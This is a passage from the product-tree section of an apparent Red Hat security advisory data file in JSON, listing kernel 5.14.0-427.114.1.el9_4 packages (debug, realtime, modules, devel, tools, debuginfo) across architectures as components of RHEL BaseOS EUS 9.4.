"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "BaseOS-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
